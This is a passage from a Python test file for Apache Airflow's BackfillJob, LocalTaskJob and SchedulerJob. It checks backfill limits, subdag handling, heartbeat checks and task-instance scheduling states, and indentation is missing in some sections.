(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEquals(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEquals(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
"""
Test that we can run naive (non-localized) task instances
"""
NAIVE_DATE = datetime.datetime(2016, 1, 1)
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
NAIVE_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=NAIVE_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
    def test_cli_backfill_depends_on_past(self):
        """
        Test that CLI respects -I argument
        """
        dag_id = 'test_dagrun_states_deadlock'
        run_date = DEFAULT_DATE + datetime.timedelta(days=1)
        args = [
            'backfill',
            dag_id,
            '-l',
            '-s',
            run_date.isoformat(),
        ]
        dag = self.dagbag.get_dag(dag_id)
        dag.clear()
        # Without -I the depends_on_past dag cannot progress and deadlocks.
        self.assertRaisesRegexp(
            AirflowException,
            'BackfillJob is deadlocked',
            cli.backfill,
            self.parser.parse_args(args))
        # -I (ignore_first_depends_on_past) lets the first run proceed.
        cli.backfill(self.parser.parse_args(args + ['-I']))
        ti = TI(dag.get_task('test_depends_on_past'), run_date)
        ti.refresh_from_db()
        # task ran
        self.assertEqual(ti.state, State.SUCCESS)
        dag.clear()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
    def test_backfill_max_limit_check_within_limit(self):
        """When max_active_runs exceeds the requested range, every run
        executes and succeeds."""
        dag = self._get_dag_test_max_active_limits(
            'test_backfill_max_limit_check_within_limit',
            max_active_runs=16)
        start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
        end_date = DEFAULT_DATE
        executor = TestExecutor(do_update=True)
        job = BackfillJob(dag=dag,
                          start_date=start_date,
                          end_date=end_date,
                          executor=executor,
                          donot_pickle=True)
        job.run()
        dagruns = DagRun.find(dag_id=dag.dag_id)
        # Hourly schedule over a one-hour window -> 2 runs, both SUCCESS.
        self.assertEqual(2, len(dagruns))
        self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
    def test_backfill_max_limit_check(self):
        """A pre-existing RUNNING dag run outside the backfill window counts
        against max_active_runs, making the backfill wait until it finishes."""
        dag_id = 'test_backfill_max_limit_check'
        run_id = 'test_dagrun'
        start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
        end_date = DEFAULT_DATE
        # Hand-off point between this thread and the backfill thread below.
        dag_run_created_cond = threading.Condition()

        def run_backfill(cond):
            cond.acquire()
            try:
                dag = self._get_dag_test_max_active_limits(dag_id)
                # this session object is different than the one in the main thread
                thread_session = settings.Session()
                # Existing dagrun that is not within the backfill range
                dag.create_dagrun(
                    run_id=run_id,
                    state=State.RUNNING,
                    execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
                    start_date=DEFAULT_DATE,
                )
                thread_session.commit()
                # Tell the main thread the blocking dag run now exists.
                cond.notify()
            finally:
                cond.release()
            # The backfill itself blocks until the run above leaves RUNNING.
            executor = TestExecutor(do_update=True)
            job = BackfillJob(dag=dag,
                              start_date=start_date,
                              end_date=end_date,
                              executor=executor,
                              donot_pickle=True)
            job.run()
            thread_session.close()

        backfill_job_thread = threading.Thread(target=run_backfill,
                                               name="run_backfill",
                                               args=(dag_run_created_cond,))
        dag_run_created_cond.acquire()
        session = settings.Session()
        backfill_job_thread.start()
        try:
            # at this point backfill can't run since the max_active_runs has been
            # reached, so it is waiting
            # NOTE(review): a fixed 1.5s wait could be flaky on a slow machine.
            dag_run_created_cond.wait(timeout=1.5)
            dagruns = DagRun.find(dag_id=dag_id)
            dr = dagruns[0]
            self.assertEqual(1, len(dagruns))
            self.assertEqual(dr.run_id, run_id)
            # allow the backfill to execute by setting the existing dag run to SUCCESS,
            # backfill will execute dag runs 1 by 1
            dr.set_state(State.SUCCESS)
            session.merge(dr)
            session.commit()
            session.close()
            backfill_job_thread.join()
            dagruns = DagRun.find(dag_id=dag_id)
            self.assertEqual(3, len(dagruns))  # 2 from backfill + 1 existing
            self.assertEqual(dagruns[-1].run_id, dr.run_id)
        finally:
            dag_run_created_cond.release()
    def test_backfill_max_limit_check_no_count_existing(self):
        """An existing dag run INSIDE the backfill window does not count
        against max_active_runs."""
        dag = self._get_dag_test_max_active_limits(
            'test_backfill_max_limit_check_no_count_existing')
        start_date = DEFAULT_DATE
        end_date = DEFAULT_DATE
        # Existing dagrun that is within the backfill range
        dag.create_dagrun(run_id="test_existing_backfill",
                          state=State.RUNNING,
                          execution_date=DEFAULT_DATE,
                          start_date=DEFAULT_DATE)
        executor = TestExecutor(do_update=True)
        job = BackfillJob(dag=dag,
                          start_date=start_date,
                          end_date=end_date,
                          executor=executor,
                          donot_pickle=True)
        job.run()
        # BackfillJob will run since the existing DagRun does not count for the max
        # active limit since it's within the backfill date range.
        dagruns = DagRun.find(dag_id=dag.dag_id)
        # will only be able to run 1 (the existing one) since there's just
        # one dag run slot left given the max_active_runs limit
        self.assertEqual(1, len(dagruns))
        self.assertEqual(State.SUCCESS, dagruns[0].state)
    def test_backfill_max_limit_check_complete_loop(self):
        """With max_active_runs=1 the backfill loops until every run in the
        window has completed, leaving nothing RUNNING."""
        dag = self._get_dag_test_max_active_limits(
            'test_backfill_max_limit_check_complete_loop')
        start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
        end_date = DEFAULT_DATE
        # Given the max limit to be 1 in active dag runs, the backfill has to
        # process the window one run at a time.
        # NOTE(review): the window holds 2 hourly runs, hence success_expected=2
        # (the original comment said "3 times").
        success_expected = 2
        executor = TestExecutor(do_update=True)
        job = BackfillJob(dag=dag,
                          start_date=start_date,
                          end_date=end_date,
                          executor=executor,
                          donot_pickle=True)
        job.run()
        success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
        running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
        self.assertEqual(success_expected, success_dagruns)
        self.assertEqual(0, running_dagruns)  # no dag_runs in running state are left
    def test_sub_set_subdag(self):
        """Backfilling a sub_dag (filtered by task_regex) runs only the
        matching tasks and re-creates the dag run under a backfill run_id."""
        dag = DAG(
            'test_sub_set_subdag',
            start_date=DEFAULT_DATE,
            default_args={'owner': 'owner1'})
        with dag:
            op1 = DummyOperator(task_id='leave1')
            op2 = DummyOperator(task_id='leave2')
            op3 = DummyOperator(task_id='upstream_level_1')
            op4 = DummyOperator(task_id='upstream_level_2')
            op5 = DummyOperator(task_id='upstream_level_3')
            # order randomly
            op2.set_downstream(op3)
            op1.set_downstream(op3)
            op4.set_downstream(op5)
            op3.set_downstream(op4)
        dag.clear()
        dr = dag.create_dagrun(run_id="test",
                               state=State.RUNNING,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE)
        executor = TestExecutor(do_update=True)
        # Regex selects the two 'leave*' tasks only.
        sub_dag = dag.sub_dag(task_regex="leave*",
                              include_downstream=False,
                              include_upstream=False)
        job = BackfillJob(dag=sub_dag,
                          start_date=DEFAULT_DATE,
                          end_date=DEFAULT_DATE,
                          executor=executor)
        job.run()
        # the run_id should have changed, so a refresh won't work
        self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
        drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
        dr = drs[0]
        self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
                         dr.run_id)
        for ti in dr.get_task_instances():
            # Only the selected leaves ran; everything else stays NONE.
            if ti.task_id == 'leave1' or ti.task_id == 'leave2':
                self.assertEqual(State.SUCCESS, ti.state)
            else:
                self.assertEqual(State.NONE, ti.state)
    def test_backfill_fill_blanks(self):
        """Backfill adopts task instances left in assorted states: runnable
        ones (UP_FOR_RETRY, SCHEDULED, None) get executed, terminal ones
        (FAILED, SKIPPED, UPSTREAM_FAILED) are preserved and fail the job."""
        dag = DAG(
            'test_backfill_fill_blanks',
            start_date=DEFAULT_DATE,
            default_args={'owner': 'owner1'},
        )
        with dag:
            op1 = DummyOperator(task_id='op1')
            op2 = DummyOperator(task_id='op2')
            op3 = DummyOperator(task_id='op3')
            op4 = DummyOperator(task_id='op4')
            op5 = DummyOperator(task_id='op5')
            op6 = DummyOperator(task_id='op6')
        dag.clear()
        dr = dag.create_dagrun(run_id='test',
                               state=State.RUNNING,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE)
        executor = TestExecutor(do_update=True)
        session = settings.Session()
        # Seed each ti with a different starting state.
        tis = dr.get_task_instances()
        for ti in tis:
            if ti.task_id == op1.task_id:
                ti.state = State.UP_FOR_RETRY
                ti.end_date = DEFAULT_DATE
            elif ti.task_id == op2.task_id:
                ti.state = State.FAILED
            elif ti.task_id == op3.task_id:
                ti.state = State.SKIPPED
            elif ti.task_id == op4.task_id:
                ti.state = State.SCHEDULED
            elif ti.task_id == op5.task_id:
                ti.state = State.UPSTREAM_FAILED
            # op6 = None
            session.merge(ti)
        session.commit()
        session.close()
        job = BackfillJob(dag=dag,
                          start_date=DEFAULT_DATE,
                          end_date=DEFAULT_DATE,
                          executor=executor)
        # The pre-failed tasks make the whole backfill report failure.
        self.assertRaisesRegexp(
            AirflowException,
            'Some task instances failed',
            job.run)
        # the run_id should have changed, so a refresh won't work
        self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
        drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
        dr = drs[0]
        self.assertEqual(dr.state, State.FAILED)
        tis = dr.get_task_instances()
        for ti in tis:
            if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
                self.assertEqual(ti.state, State.SUCCESS)
            elif ti.task_id == op2.task_id:
                self.assertEqual(ti.state, State.FAILED)
            elif ti.task_id == op3.task_id:
                self.assertEqual(ti.state, State.SKIPPED)
            elif ti.task_id == op5.task_id:
                self.assertEqual(ti.state, State.UPSTREAM_FAILED)
    def test_backfill_execute_subdag(self):
        """Backfilling the 'section-1' subdag executes all five of its task
        instances."""
        dag = self.dagbag.get_dag('example_subdag_operator')
        subdag_op_task = dag.get_task('section-1')
        subdag = subdag_op_task.subdag
        subdag.schedule_interval = '@daily'
        start_date = timezone.utcnow()
        executor = TestExecutor(do_update=True)
        job = BackfillJob(dag=subdag,
                          start_date=start_date,
                          end_date=start_date,
                          executor=executor,
                          donot_pickle=True)
        job.run()
        history = executor.history
        subdag_history = history[0]
        # check that all 5 task instances of the subdag 'section-1' were executed
        self.assertEqual(5, len(subdag_history))
        for sdh in subdag_history:
            ti = sdh[3]
            self.assertIn('section-1-task-', ti.task_id)
        subdag.clear()
        dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
with timeout(seconds=30):
job.run()
ti0 = TI(
task=subdag.get_task('section-1-task-1'),
execution_date=DEFAULT_DATE)
ti0.refresh_from_db()
self.assertEqual(ti0.state, State.SUCCESS)
sdag = subdag.sub_dag(
task_regex='section-1-task-1',
include_downstream=True,
include_upstream=False)
sdag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
include_parentdag=True)
ti0.refresh_from_db()
self.assertEquals(State.NONE, ti0.state)
ti1 = TI(
task=dag.get_task('some-other-task'),
execution_date=DEFAULT_DATE)
self.assertEquals(State.NONE, ti1.state)
# Checks that all the Downstream tasks for Parent DAG
# have been cleared
for task in subdag_op_task.downstream_list:
ti = TI(
task=dag.get_task(task.task_id),
execution_date=DEFAULT_DATE
)
self.assertEquals(State.NONE, ti.state)
subdag.clear()
dag.clear()
    def test_backfill_execute_subdag_with_removed_task(self):
        """
        Ensure that subdag operators execute properly in the case where
        an associated task of the subdag has been removed from the dag
        definition, but has instances in the database from previous runs.
        """
        dag = self.dagbag.get_dag('example_subdag_operator')
        subdag = dag.get_task('section-1').subdag
        executor = TestExecutor(do_update=True)
        job = BackfillJob(dag=subdag,
                          start_date=DEFAULT_DATE,
                          end_date=DEFAULT_DATE,
                          executor=executor,
                          donot_pickle=True)
        # Plant a leftover REMOVED ti that no longer exists in the dag.
        removed_task_ti = TI(
            task=DummyOperator(task_id='removed_task'),
            execution_date=DEFAULT_DATE,
            state=State.REMOVED)
        removed_task_ti.dag_id = subdag.dag_id
        session = settings.Session()
        session.merge(removed_task_ti)
        with timeout(seconds=30):
            job.run()
        # Every current task of the subdag ran to SUCCESS...
        for task in subdag.tasks:
            instance = session.query(TI).filter(
                TI.dag_id == subdag.dag_id,
                TI.task_id == task.task_id,
                TI.execution_date == DEFAULT_DATE).first()
            self.assertIsNotNone(instance)
            self.assertEqual(instance.state, State.SUCCESS)
        # ...while the leftover ti stays REMOVED, untouched by the backfill.
        removed_task_ti.refresh_from_db()
        self.assertEqual(removed_task_ti.state, State.REMOVED)
        subdag.clear()
        dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for reschedule
# test for failed
ti.set_state(State.NONE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
class LocalTaskJobTest(unittest.TestCase):
    """Tests for LocalTaskJob: attribute wiring, heartbeat hostname/pid
    checks, mark-success handling, and double-trigger protection."""

    def setUp(self):
        # No shared fixtures; each test builds its own DAG and session.
        pass

    def test_localtaskjob_essential_attr(self):
        """
        Check whether essential attributes
        of LocalTaskJob can be assigned with
        proper values without intervention
        """
        dag = DAG(
            'test_localtaskjob_essential_attr',
            start_date=DEFAULT_DATE,
            default_args={'owner': 'owner1'})
        with dag:
            op1 = DummyOperator(task_id='op1')
        dag.clear()
        dr = dag.create_dagrun(run_id="test",
                               state=State.SUCCESS,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE)
        ti = dr.get_task_instance(task_id=op1.task_id)
        job1 = LocalTaskJob(task_instance=ti,
                            ignore_ti_state=True,
                            executor=SequentialExecutor())
        essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
        # Every essential attribute must exist ...
        check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
        self.assertTrue(all(check_result_1))
        # ... and must be populated with a non-None value.
        check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
        self.assertTrue(all(check_result_2))

    @patch('os.getpid')
    def test_localtaskjob_heartbeat(self, mock_pid):
        """heartbeat_callback must raise AirflowException when the recorded
        hostname or pid does not match the current process, and return None
        when both match."""
        session = settings.Session()
        dag = DAG(
            'test_localtaskjob_heartbeat',
            start_date=DEFAULT_DATE,
            default_args={'owner': 'owner1'})
        with dag:
            op1 = DummyOperator(task_id='op1')
        dag.clear()
        dr = dag.create_dagrun(run_id="test",
                               state=State.SUCCESS,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE,
                               session=session)
        ti = dr.get_task_instance(task_id=op1.task_id, session=session)
        ti.state = State.RUNNING
        # Hostname mismatch -> heartbeat must fail.
        ti.hostname = "blablabla"
        session.commit()
        job1 = LocalTaskJob(task_instance=ti,
                            ignore_ti_state=True,
                            executor=SequentialExecutor())
        self.assertRaises(AirflowException, job1.heartbeat_callback)
        # Matching hostname and pid -> heartbeat passes, returning None.
        mock_pid.return_value = 1
        ti.state = State.RUNNING
        ti.hostname = get_hostname()
        ti.pid = 1
        session.merge(ti)
        session.commit()
        ret = job1.heartbeat_callback()
        self.assertEqual(ret, None)
        # Pid mismatch -> heartbeat must fail again.
        mock_pid.return_value = 2
        self.assertRaises(AirflowException, job1.heartbeat_callback)

    @unittest.skipIf('mysql' in configuration.conf.get('core', 'sql_alchemy_conn'),
                     "flaky when run on mysql")
    @unittest.skipIf('postgresql' in configuration.conf.get('core', 'sql_alchemy_conn'),
                     'flaky when run on postgresql')
    def test_mark_success_no_kill(self):
        """
        Test that ensures that mark_success in the UI doesn't cause
        the task to fail, and that the task exits
        """
        dagbag = models.DagBag(
            dag_folder=TEST_DAG_FOLDER,
            include_examples=False,
        )
        dag = dagbag.dags.get('test_mark_success')
        task = dag.get_task('task1')
        session = settings.Session()
        dag.clear()
        dag.create_dagrun(run_id="test",
                          state=State.RUNNING,
                          execution_date=DEFAULT_DATE,
                          start_date=DEFAULT_DATE,
                          session=session)
        ti = TI(task=task, execution_date=DEFAULT_DATE)
        ti.refresh_from_db()
        job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
        # Run the job in a separate process so this process can flip the
        # task-instance state while it executes.
        process = multiprocessing.Process(target=job1.run)
        process.start()
        ti.refresh_from_db()
        # Poll up to ~5 seconds for the task to reach RUNNING.
        for i in range(0, 50):
            if ti.state == State.RUNNING:
                break
            time.sleep(0.1)
            ti.refresh_from_db()
        self.assertEqual(State.RUNNING, ti.state)
        # Simulate "mark success" performed from the UI.
        ti.state = State.SUCCESS
        session.merge(ti)
        session.commit()
        process.join(timeout=10)
        self.assertFalse(process.is_alive())
        ti.refresh_from_db()
        self.assertEqual(State.SUCCESS, ti.state)

    def test_localtaskjob_double_trigger(self):
        """A LocalTaskJob must not start a task runner for a task instance
        that is already RUNNING elsewhere (recorded hostname/pid)."""
        dagbag = models.DagBag(
            dag_folder=TEST_DAG_FOLDER,
            include_examples=False,
        )
        dag = dagbag.dags.get('test_localtaskjob_double_trigger')
        task = dag.get_task('test_localtaskjob_double_trigger_task')
        session = settings.Session()
        dag.clear()
        dr = dag.create_dagrun(run_id="test",
                               state=State.SUCCESS,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE,
                               session=session)
        ti = dr.get_task_instance(task_id=task.task_id, session=session)
        ti.state = State.RUNNING
        ti.hostname = get_hostname()
        ti.pid = 1
        session.commit()
        ti_run = TI(task=task, execution_date=DEFAULT_DATE)
        job1 = LocalTaskJob(task_instance=ti_run,
                            ignore_ti_state=True,
                            executor=SequentialExecutor())
        # The task runner must never be started for the duplicate job.
        with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
            job1.run()
            mock_method.assert_not_called()
        # The original task instance must be left untouched.
        ti = dr.get_task_instance(task_id=task.task_id, session=session)
        self.assertEqual(ti.pid, 1)
        self.assertEqual(ti.state, State.RUNNING)
        session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
self.dagbag = DagBag()
with create_session() as session:
session.query(models.DagRun).delete()
session.query(models.ImportError).delete()
session.commit()
    @staticmethod
    def run_single_scheduler_loop_with_no_dags(dags_folder):
        """
        Utility function that runs a single scheduler loop without actually
        changing/scheduling any dags. This is useful to simulate the other side effects of
        running a scheduler loop, e.g. to see what parse errors there are in the
        dags_folder.

        :param dags_folder: the directory to traverse
        :type dags_folder: str
        """
        scheduler = SchedulerJob(
            dag_id='this_dag_doesnt_exist',  # We don't want to actually run anything
            num_runs=1,
            subdir=os.path.join(dags_folder))
        scheduler.heartrate = 0
        scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
    def test_no_orphan_process_will_be_left(self):
        """A scheduler run over an empty dags folder must not leave any
        orphan child processes behind."""
        empty_dir = mkdtemp()
        current_process = psutil.Process()
        # Snapshot pre-existing children so leftovers from other tests are
        # excluded from the final check.
        old_children = current_process.children(recursive=True)
        scheduler = SchedulerJob(subdir=empty_dir,
                                 num_runs=1)
        scheduler.executor = TestExecutor()
        scheduler.run()
        shutil.rmtree(empty_dir)
        # Remove potential noise created by previous tests.
        current_children = set(current_process.children(recursive=True)) - set(
            old_children)
        self.assertFalse(current_children)
    def test_process_executor_events(self):
        """Executor events are applied only to task instances whose DAG is
        present in the SimpleDagBag handed to the scheduler."""
        dag_id = "test_process_executor_events"
        dag_id2 = "test_process_executor_events_2"
        task_id_1 = 'dummy_task'
        dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
        dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
        task1 = DummyOperator(dag=dag, task_id=task_id_1)
        DummyOperator(dag=dag2, task_id=task_id_1)
        dagbag1 = self._make_simple_dag_bag([dag])
        dagbag2 = self._make_simple_dag_bag([dag2])
        scheduler = SchedulerJob()
        session = settings.Session()
        ti1 = TI(task1, DEFAULT_DATE)
        ti1.state = State.QUEUED
        session.merge(ti1)
        session.commit()
        executor = TestExecutor()
        # Queue a FAILED event for ti1.
        executor.event_buffer[ti1.key] = State.FAILED
        scheduler.executor = executor
        # dag bag does not contain dag_id -> event is ignored
        scheduler._process_executor_events(simple_dag_bag=dagbag2)
        ti1.refresh_from_db()
        self.assertEqual(ti1.state, State.QUEUED)
        # dag bag does contain dag_id -> event is applied
        scheduler._process_executor_events(simple_dag_bag=dagbag1)
        ti1.refresh_from_db()
        self.assertEqual(ti1.state, State.FAILED)
        # A SUCCESS event is applied the same way.
        ti1.state = State.SUCCESS
        session.merge(ti1)
        session.commit()
        executor.event_buffer[ti1.key] = State.SUCCESS
        scheduler._process_executor_events(simple_dag_bag=dagbag1)
        ti1.refresh_from_db()
        self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
